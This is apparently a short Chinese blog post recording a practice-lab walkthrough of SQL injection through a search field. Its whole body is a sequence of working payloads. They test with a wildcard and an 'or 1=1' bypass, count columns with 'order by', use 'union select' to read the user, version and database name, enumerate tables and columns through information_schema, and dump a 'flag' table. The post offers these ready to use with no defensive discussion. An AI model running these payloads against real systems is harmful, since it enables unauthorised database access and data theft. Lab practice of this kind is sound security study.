实战搜索型注入

payload:%

payload:aa' or 1=1 #

payload:%' order by 5 #

payload:%' order by 6 #

payload:%' union select 1,2,3,4,5 #

payload:%' union select 1,user(),version(),database(),5 #

payload:%' union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema='dwvs' #

payload:%' union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema='dwvs' and table_name='flag' #

payload:%' union select 1,group_concat(id,flag),3,4,5 from dwvs.flag #

posted on 2025-01-05 01:48  Ad1ey  阅读(3)  评论(0编辑  收藏  举报

Powered by: 博客园 Copyright © 2025 Ad1ey
Powered by .NET 9.0 on Kubernetes